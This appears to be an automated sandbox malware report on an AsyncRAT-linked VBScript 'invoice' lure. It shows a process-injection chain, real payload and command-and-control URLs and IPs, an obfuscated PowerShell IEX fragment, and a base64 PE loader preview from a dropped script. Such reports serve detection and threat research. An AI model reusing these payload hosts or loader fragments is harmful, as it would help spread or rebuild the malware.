Source: Yara match | File source: 5.3.powershell.exe.5bcd1ec.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.powershell.exe.b670778.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.powershell.exe.b6827bc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.powershell.exe.5bcd1ec.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.powershell.exe.5bbb094.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.powershell.exe.b6827bc.6.unpack, type: UNPACKEDPE
Source: aspnet_compiler.exe, 00000009.00000003.749662018.0000000005145000.00000004.00000001.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation1 | Startup Items1 | Startup Items1 | Disable or Modify Tools1 | OS Credential Dumping | File and Directory Discovery2 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting121 | Scheduled Task/Job1 | Process Injection212 | Scripting121 | LSASS Memory | System Information Discovery14 | Remote Desktop Protocol | Email Collection1 | Exfiltration Over Bluetooth | Encrypted Channel12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Scheduled Task/Job1 | Registry Run Keys / Startup Folder2 | Scheduled Task/Job1 | Obfuscated Files or Information121 | Security Account Manager | Query Registry1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder2 | Software Packing1 | NTDS | Security Software Discovery131 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading1 | LSA Secrets | Virtualization/Sandbox Evasion3 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol113 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion3 | Cached Domain Credentials | Process Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection212 | DCSync | Application Window Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 359309 | Sample: Invoice-ID-(882451).vbs | Start date: 27/02/2021 | Architecture: WINDOWS | Score: 100
Signatures on the sample node: Found malware configuration; Yara detected obfuscated html page; Yara detected AsyncRAT; 4 other signatures
Process tree recovered from the graph data (the graph image is not part of this extraction):
wscript.exe (VBScript performs obfuscated calls to suspicious functions)
  -> mshta.exe, contacts ahmedadel.work (212.64.222.172, ports 49706, 49710, 49721, ATLAS-ASTR, Turkey)
     -> powershell.exe, contacts ahmedadel.work and ia801503.us.archive.org (207.241.228.153, port 443, INTERNET-ARCHIVEUS, United States); drops C:\Users\user\AppData\Roaming\...\Run.hta (HTML)
        -> conhost.exe
        -> powershell.exe (Writes to foreign memory regions; Injects a PE file into a foreign processes)
           -> aspnet_compiler.exe, contacts clayroot2016.linkpc.net (193.23.3.13, ports 49725, 6666, HOSTSLIM-GLOBAL-NETWORKNL)
           -> aspnet_compiler.exe
mshta.exe (second start node)
  -> powershell.exe (Writes to foreign memory regions; Injects a PE file into a foreign processes)
     -> conhost.exe
     -> aspnet_compiler.exe


                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  No Antivirus matches

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

Source | Detection | Scanner | Label
10.2.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
9.2.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen

                  Domains

                  No Antivirus matches

                  URLs

Source | Detection | Scanner | Label
http://ahmedadel.work/cairo/Encoding.txt | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txt... | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txtLMEMX | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/ALL.txt | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/ALm | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txthttp://ahmedadel.work/cairo/Encoding.txt | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txtHmw | 0% | Avira URL Cloud | safe
http://www.microsoft.co | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
http://ahmedadel.workx | 0% | Avira URL Cloud | safe
https://ia801503.us.archive.orgx | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txtt | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txtY | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txtf | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://ahmedadel.work/cairo/Encoding.txt...s | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txtndowsINetCookies | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Server.txt | 0% | Avira URL Cloud | safe
http://ahmedadel.work | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txt? | 0% | Avira URL Cloud | safe
http://w7icrosoft.comts/MicTiPCA_01.c | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
http://ahmedadel.work/cairo/Encoding.txtH | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txtC: | 0% | Avira URL Cloud | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://ahmedadel.work/cairo/Server.txtX | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txt0 | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txtPROFILE_Sxf | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txt7 | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txtionalmw | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/Encoding.txtndows | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/ALL.txtX | 0% | Avira URL Cloud | safe
http://ahmedadel.work/cairo/ALL.txt%27%27%29%27%3B%24TC%3DI%60E%60X%20%28%24c1%2C%24c4%2C%24c3%20-Jo | 0% | Avira URL Cloud | safe

                  Domains and IPs

                  Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
clayroot2016.linkpc.net | 193.23.3.13 | true | false | (none) | high
ahmedadel.work | 212.64.222.172 | true | true | (none) | unknown
ia801503.us.archive.org | 207.241.228.153 | true | false | (none) | high

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://ahmedadel.work/cairo/Encoding.txt | true | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/ALL.txt | true | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/Server.txt | false | Avira URL Cloud: safe | unknown
clayroot2016.linkpc.net | false | (none) | high

                          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://ahmedadel.work/cairo/Encoding.txt... | mshta.exe, 00000001.00000002.651474574.000002454F71E000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/Encoding.txtLMEMX | mshta.exe, 00000001.00000003.643767843.0000024D52A83000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/ALm | mshta.exe, 00000001.00000002.651515709.000002454F74E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/Encoding.txthttp://ahmedadel.work/cairo/Encoding.txt | mshta.exe, 00000001.00000003.643922704.0000024D52395000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://certificates.godaddy.com/repository/0 | powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp | false | (none) | high
http://ahmedadel.work/cairo/Encoding.txtHmw | mshta.exe, 00000001.00000002.651331087.000002454F660000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.co | powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ahmedadel.workx | powershell.exe, 00000002.00000002.909554931.000001DEA68B8000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://ia801503.us.archive.orgx | powershell.exe, 00000002.00000002.910230199.000001DEA69FC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/Encoding.txtt | mshta.exe, 00000001.00000002.651380882.000002454F69B000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/Encoding.txtY | wscript.exe, 00000000.00000003.637263450.000001CFFB734000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://ia801503.us.archive.org/13/items/startup_20210219/Startup.txt0y | powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp | false | (none) | high
https://ia801503.us.archive.org/13/items/startup_20210219/StartuX | powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp | false | (none) | high
http://ahmedadel.work/cairo/Encoding.txtf | wscript.exe, 00000000.00000002.637433590.000001CFFB767000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmp | false | (none) | high
http://ahmedadel.work/cairo/Encoding.txt...s | mshta.exe, 00000001.00000002.651474574.000002454F71E000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/Encoding.txtndowsINetCookies | mshta.exe, 00000001.00000002.651371236.000002454F695000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://certificates.godaddy.com/repository/gdig2.crt0 | powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.905111532.000001DEA5C11000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.906066406.0000000005121000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.906122785.000002AA66FB1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.904887989.0000000002C01000.00000004.00000001.sdmp | false | (none) | high
http://ahmedadel.work | powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/Encoding.txt? | wscript.exe, 00000000.00000003.637263450.000001CFFB734000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmp | false | (none) | high
http://crl.godaddy.com/gdig2s1-1597.crl0 | powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp | false | (none) | high
http://w7icrosoft.comts/MicTiPCA_01.c | powershell.exe, 00000002.00000002.917290171.000001DEBE1D8000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.917186570.000001DEBE16A000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.905662877.000001DEA5E21000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.917186570.000001DEBE16A000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.905662877.000001DEA5E21000.00000004.00000001.sdmp | false | (none) | high
https://go.micro | powershell.exe, 00000002.00000002.914665953.000001DEA7869000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ahmedadel.work/cairo/Encoding.txtH | mshta.exe, 00000001.00000002.651380882.000002454F69B000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/Encoding.txtC: | mshta.exe, 00000001.00000002.651459548.000002454F711000.00000004.00000020.sdmp, mshta.exe, 00000001.00000002.651331087.000002454F660000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://certs.godaddy.com/repository/1301 | powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp | false | (none) | high
https://ia801503.us.archive.org | powershell.exe, 00000002.00000002.910230199.000001DEA69FC000.00000004.00000001.sdmp | false | (none) | high
https://contoso.com/Icon | powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ahmedadel.work/cairo/Server.txtX | powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/Encoding.txt0 | wscript.exe, 00000000.00000003.637242970.000001CFFB729000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://ia801503.us.archive.org/13/items/startup_20210219/Startup.txt | powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.910230199.000001DEA69FC000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.909554931.000001DEA68B8000.00000004.00000001.sdmp | false | (none) | high
https://certs.godaddy.com/repository/0 | powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp | false | (none) | high
http://ahmedadel.work/cairo/Encoding.txtPROFILE_Sxf | mshta.exe, 00000001.00000002.651705439.000002454F8C0000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/Encoding.txt7 | mshta.exe, 00000001.00000002.651499116.000002454F73A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://ahmedadel.work/cairo/Encoding.txtionalmw | mshta.exe, 00000001.00000002.651371236.000002454F695000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.917186570.000001DEBE16A000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.905662877.000001DEA5E21000.00000004.00000001.sdmp | false | (none) | high
http://crl.godaddy.com/gdroot-g2.crl0F | powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp | false | (none) | high
http://ahmedadel.work/cairo/Encoding.txtndows | mshta.exe, 00000001.00000002.651371236.000002454F695000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://ia801503.us.archive.org | powershell.exe, 00000002.00000002.910338549.000001DEA6A4C000.00000004.00000001.sdmp | false | (none) | high
http://ahmedadel.work/cairo/ALL.txtX | powershell.exe, 00000002.00000002.908984002.000001DEA67A2000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.godaddy.com/gdroot.crl0F | powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp | false | (none) | high
http://ahmedadel.work/cairo/ALL.txt%27%27%29%27%3B%24TC%3DI%60E%60X%20%28%24c1%2C%24c4%2C%24c3%20-Jo | mshta.exe, 00000001.00000002.651515709.000002454F74E000.00000004.00000001.sdmp, mshta.exe, 00000001.00000002.652619299.0000024D52298000.00000004.00000001.sdmp, Encoding[1].txt.1.dr | false | Avira URL Cloud: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
193.23.3.13 | unknown | unknown | 207083 | HOSTSLIM-GLOBAL-NETWORKNL | false
212.64.222.172 | unknown | Turkey | 12599 | ATLAS-ASTR | true
207.241.228.153 | unknown | United States | 7941 | INTERNET-ARCHIVEUS | false

                                                            General Information

                                                            Joe Sandbox Version:31.0.0 Emerald
                                                            Analysis ID:359309
                                                            Start date:27.02.2021
                                                            Start time:19:17:17
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 8m 31s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Sample file name:Invoice-ID-(882451).vbs
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:11
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.phis.troj.evad.winVBS@18/18@5/3
                                                            EGA Information:Failed
                                                            HDC Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 169
                                                            • Number of non-executed functions: 1
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .vbs
                                                            Warnings:
                                                            • Excluded IPs from analysis (whitelisted): 104.43.139.144, 13.88.21.125, 104.43.193.48, 40.88.32.150, 13.64.90.137, 8.248.145.254, 67.27.235.254, 67.27.158.254, 8.253.95.120, 8.241.11.126
                                                            • Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, skypedataprdcolwus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net, skypedataprdcolcus15.cloudapp.net
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            Time | Type | Description
                                                            19:18:04 | API Interceptor | 151x Sleep call for process: powershell.exe modified
                                                            19:18:15 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta
                                                            19:18:39 | API Interceptor | 2x Sleep call for process: aspnet_compiler.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            Match: clayroot2016.linkpc.net
                                                            Associated Sample Name / URL | Detection | Context
                                                            Invoice ID-(4387206).vbs | malicious | 168.119.103.207
                                                            Invoice ID-(684472).vbs | malicious | 135.181.96.16
                                                            Payment Invoice##(6321210).vbs | malicious | 173.234.155.108

                                                            ASN

                                                            Match: INTERNET-ARCHIVEUS
                                                            Associated Sample Name / URL | Detection | Context
                                                            PO#00187.ppt | malicious | 207.241.227.118
                                                            Request for Quotation76584454.ppt | malicious | 207.241.228.140
                                                            SKM_36721012514070-2.ppt | malicious | 207.241.228.143
                                                            SOA - NCL INTER LOGISTICS.ppt | malicious | 207.241.227.121
                                                            24.pps | malicious | 207.241.224.2
                                                            4.pps | malicious | 207.241.224.2
                                                            Offer Nr 0226.pps | malicious | 207.241.224.2
                                                            Inquiry 09.ppt | malicious | 207.241.228.143
                                                            Invoice ID-(4387206).vbs | malicious | 207.241.228.157
                                                            Ekz Payment.htm | malicious | 207.241.224.2
                                                            invoice-ID9411548.vbs | malicious | 207.241.227.122
                                                            Invoice ID-(684472).vbs | malicious | 207.241.227.112
                                                            Payment Invoice##(6321210).vbs | malicious | 207.241.227.121
                                                            Order List and Quantities.ppt | malicious | 207.241.228.142
                                                            https://protect-us.mimecast.com/s/sQmcCn5YzpcGLR8q4SJaZjF?domain=mobilitywithlove.com/ | malicious | 207.241.226.190
                                                            Order List and Quantities.ppt | malicious | 207.241.228.142
                                                            Price List.ppt | malicious | 207.241.228.142
                                                            Standardequips_Quote.ppt | malicious | 207.241.227.115
                                                            Purchase list.ppt | malicious | 207.241.228.142

                                                            JA3 Fingerprints

                                                            Match: 54328bd36c14bd82ddaa0c04b25ed9ad
                                                            Associated Sample Name / URL | Detection | Context
                                                            SecuriteInfo.com.Mal.Generic-S.247.exe | malicious | 207.241.228.153
                                                            ORDER0023490923.exe | malicious | 207.241.228.153
                                                            ORDER009882377343.exe | malicious | 207.241.228.153
                                                            PO - RFQ # 097663899.exe | malicious | 207.241.228.153
                                                            Transfer Forms.exe | malicious | 207.241.228.153
                                                            DHL delivery 9808765668,pdf.exe | malicious | 207.241.228.153
                                                            TT copy.exe | malicious | 207.241.228.153
                                                            AKBANK, MT 103 SWIFT ODEME EMRI-USD-78,000.00..exe | malicious | 207.241.228.153
                                                            PO0082021FT20.exe | malicious | 207.241.228.153
                                                            AWB 9899691012 Clearance Doc.exe | malicious | 207.241.228.153
                                                            Purchase Order-147000015740.exe | malicious | 207.241.228.153
                                                            DHL SHIPMENT DOCUMENT.exe | malicious | 207.241.228.153
                                                            Transfer Forms.exe | malicious | 207.241.228.153
                                                            DHL_FORM_26022021_PDF.exe | malicious | 207.241.228.153
                                                            Shipment document.exe | malicious | 207.241.228.153
                                                            PO#SL20210224.exe | malicious | 207.241.228.153
                                                            07766554433.exe | malicious | 207.241.228.153
                                                            YnJ8kD7oW3.exe | malicious | 207.241.228.153
                                                            INVOICE-0899877.jar | malicious | 207.241.228.153
                                                            PROFORMA INVOICE.exe | malicious | 207.241.228.153

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\Public\Microsoft.ps1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):227551
                                                            Entropy (8bit):4.5993247801112895
                                                            Encrypted:false
                                                            SSDEEP:1536:mcYQSNS8xyAFKdafDD/Q9mnTn2IHuzeNAUGOAD5J+HP41AykDENo1LFaOv7OHLJX:qZZZf3JT2ne5GLVJ+HP41Ayk4
                                                            MD5:D367A423C2C8A2CD0BC2A1C25C72BEC3
                                                            SHA1:3A3859C42E7B0D78E99567D002E3499F74160F31
                                                            SHA-256:93AE6D6E74B927676845C9F7385EC4440CAE23DB7EE0F4CB1D5AEB19D7085C9C
                                                            SHA-512:1B19D89517139872CCA30359A96CC0D143FB433926E5585CAB4DC8F67E2D8813BAC125DB29B1C8685E7B30E9DC0ADB9D09103225637EA19BF6B01D7807595B14
                                                            Malicious:false
                                                            Yara Hits:
                                                            • Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: C:\Users\Public\Microsoft.ps1, Author: Florian Roth
                                                            Reputation:low
                                                            Preview: [Byte[]]$H1=[System.Convert]::FromBase64String('TVqQ||M||||E||||//8||Lg|||||||||Q|||||||||||||||||||||||||||||||||||||||||||||||g|||||4fug4|t|nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ|||||||||BQRQ||T|EE|HXhc88||||||||||O||DiEL|QY||BIB|||I||||||||XjEB|||g||||Q|E|||B||||g|||||g||B||||||||||E||||||||||Cg|Q||B|||||||||M|QIU||B|||B||||||E|||E|||||||||8||||||||||||||B|x|QBL|||||G|B|FQD|||||||||||||||||||||||||I|B||w|||DHM|E|H|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||I|||C|||||||||||||||CC|||Eg||||||||||||||C50ZXh0||||ZBEB|||g||||EgE|||Q||||||||||||||||||C|||G|uc2RhdGE||OgB||||Q|E|||I||||W|Q||||||||||||||||B|||D|LnJzcmM|||BU|w|||G|B|||E||||G|E|||||||||||||||||Q|||QC5yZWxvYw||D|||||C||Q|||g|||BwB|||||||||||||||||E|||EI|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                            Category:dropped
                                                            Size (bytes):59134
                                                            Entropy (8bit):7.995450161616763
                                                            Encrypted:true
                                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):328
                                                            Entropy (8bit):3.0908522464605643
                                                            Encrypted:false
                                                            SSDEEP:6:kKjtT+bqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:7JH3kPlE99SNxAhUeo+aKt
                                                            MD5:FE8CA48BFAAC2FB259F4EAA2A39686B8
                                                            SHA1:03BEA86D0D3BEE3B83C71B817658914BFC55F8F5
                                                            SHA-256:5D52DD2D2FDA131113633BEF283B3D6AD3313A4AAF02DCDFE2C9C345C77720AF
                                                            SHA-512:D354637ECC3A45EA466F06EEB5EECAC76856B23BB63C8B712FC7EC9A5760B79C8E5B690EE65C3EF74E35F0A4937766027BBA9B54B4A7D0C92D713A2797511F8F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: p...... ............4...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):425
                                                            Entropy (8bit):5.340009400190196
